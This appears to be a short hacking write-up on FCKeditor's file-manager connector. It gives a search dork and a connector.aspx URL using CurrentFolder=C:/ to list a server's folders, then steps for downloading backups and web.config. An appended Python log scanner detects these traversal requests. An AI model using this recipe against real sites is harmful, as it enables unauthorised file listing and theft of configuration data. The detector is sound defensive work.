FCKeditor is a lightweight text editor for use in web pages, and it can upload files too.
1- Using this dork: inurl /editor/filemanager/connectors/test.html
2- You must know which programming language the site was written in (and the web server too), then choose that programming language from Connector:
For example, the website in the PoC that I will attach uses ASP.Net.
Then click on Get Folders and Files.
3- You can put a partition name if the website is hosted on a Windows server:
https://target.com/FCKeditor/editor/filemanager/connectors/aspx/connector.aspx?Command=GetFoldersAndFiles&Type=File&CurrentFolder=C:/ (Windows server)
c:/inetpub/wwwroot/target/web.config = https://target.com/web.config
If you use this payload, the folders and files you will see are the website's folders and files.
So if you find c:/inetpub/wwwroot/target/admin/xxx/1.bak,
go to https://target.com/admin/xxx/1.bak to download it.
Note: the web.config file may not download :)
On other web servers
you can use this payload
A directory or path traversal consists in exploiting insufficient security validation / sanitization of user-supplied…
xxxx is the programming language the site was written in.
A file path traversal vulnerability allows an attacker to retrieve files from the local server.
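The requests described above, seen from the defender's side, as an added example that is not part of the original write-up: a log scanner that flags hits on the FCKeditor connectors whose CurrentFolder is an absolute or parent-relative path, plus requests for the connector test page. The log lines, host and addresses are constructed samples, and the function names are hypothetical.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Constructed access-log lines (combined log format) for illustration only.
SAMPLE_LOG = [
    '203.0.113.7 - - [01/Jan/2024:10:00:01 +0000] "GET /FCKeditor/editor/filemanager/connectors/test.html HTTP/1.1" 200 5120',
    '203.0.113.7 - - [01/Jan/2024:10:00:09 +0000] "GET /FCKeditor/editor/filemanager/connectors/aspx/connector.aspx?Command=GetFoldersAndFiles&Type=File&CurrentFolder=C:/ HTTP/1.1" 200 913',
    '198.51.100.4 - - [01/Jan/2024:10:02:00 +0000] "GET /FCKeditor/editor/filemanager/connectors/aspx/connector.aspx?Command=GetFoldersAndFiles&Type=File&CurrentFolder=%2Fimages%2F HTTP/1.1" 200 400',
    '203.0.113.7 - - [01/Jan/2024:10:03:30 +0000] "GET /FCKeditor/editor/filemanager/connectors/aspx/connector.aspx?Command=GetFoldersAndFiles&Type=File&CurrentFolder=..%2F..%2F HTTP/1.1" 200 700',
    '198.51.100.4 - - [01/Jan/2024:10:04:00 +0000] "GET /index.aspx HTTP/1.1" 200 2048',
]

REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')
CONNECTOR_RE = re.compile(r"/editor/filemanager/connectors/", re.I)

def classify_folder(folder):
    """Return why a CurrentFolder value leaves the upload root, or None if it stays inside."""
    prev = None
    while prev != folder:                 # undo repeated URL-encoding layers
        prev, folder = folder, unquote(folder)
    norm = folder.replace("\\", "/")
    if re.match(r"^[A-Za-z]:", norm):
        return "drive-letter path"
    if norm.startswith("//"):
        return "UNC path"
    if ".." in norm.split("/"):
        return "parent-directory segment"
    return None

def scan(lines):
    """Return (line_number, reason) for every suspicious connector request."""
    findings = []
    for n, line in enumerate(lines, 1):
        m = REQUEST_RE.search(line)
        if not m or not CONNECTOR_RE.search(m.group(1)):
            continue
        url = urlsplit(m.group(1))
        if url.path.lower().endswith("/connectors/test.html"):
            findings.append((n, "connector test page requested"))
            continue
        # Query keys are matched case-insensitively, as the server would do.
        params = {k.lower(): v for k, v in parse_qs(url.query, keep_blank_values=True).items()}
        for folder in params.get("currentfolder", []):
            reason = classify_folder(folder)
            if reason:
                findings.append((n, reason))
    return findings

if __name__ == "__main__":
    for lineno, reason in scan(SAMPLE_LOG):
        print(f"line {lineno}: {reason}")
```

The same `classify_folder` check can serve as input validation in front of the connector: reject the request whenever it returns a reason.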
Don't forget to share this write-up with your friends and follow me.